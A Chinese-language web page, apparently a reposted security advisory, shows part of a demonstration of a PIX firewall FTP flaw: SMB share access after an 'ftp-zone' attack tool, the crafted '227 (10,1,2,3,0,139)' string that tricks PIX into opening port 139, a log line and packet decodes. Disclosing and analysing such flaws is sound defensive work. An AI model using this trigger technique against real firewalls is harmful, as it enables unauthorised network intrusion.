PIX防火墙FTP漏洞允许非法通过防火墙
2008-12-18 12:19:09 来源:WEB开发网Program Files D 0 Tue Mar 7 11:35:11
2000
RECYCLER DHS 0 Mon Mar 13 09:35:51
2000
TEMP DA 0 Tue Mar 7 14:36:31
2000
WINNT D 0 Tue Mar 7 14:30:05
2000
64706 blocks of size 65536. 43841 blocks available
smb: > quit
-snip--
我们能看到,在执行了攻击程序ftp-zone后,现在我们可以连到目标主机的
139/tcp端口了,
并且可以访问共享目录。
而如果PIX设置了'logging console debug'选项,我们只能看到一个到21端口的连
接:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr
10.1.2.3/21 laddr 192.168.205.2/21
攻击者IP: 10.1.2.4
PIX IP: 10.1.2.3
内部IP: 192.168.205.2
PIX通过NAT将内部主机192.168.205.2的21端口映射到10.1.2.3的21端口上。
下面是通过tcpdump抓到的包,
在第11个包中,我们可以看到触发PIX不安全动作的字符串就是:
"227 (10,1,2,3,0,139)': command not understood."
PIX误以为,现在FTP server正在打开一个被动ftp的连接,目的端口在139,源端口
是任意的。
这证明,PIX在创建一个动态被动FTP连接前,只是检查是否在包的开头包含
"227 (xxx,xxx,xxx,xxx,prt,prt)"字符串。
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 ()
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
TCP Data
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
更多精彩
赞助商链接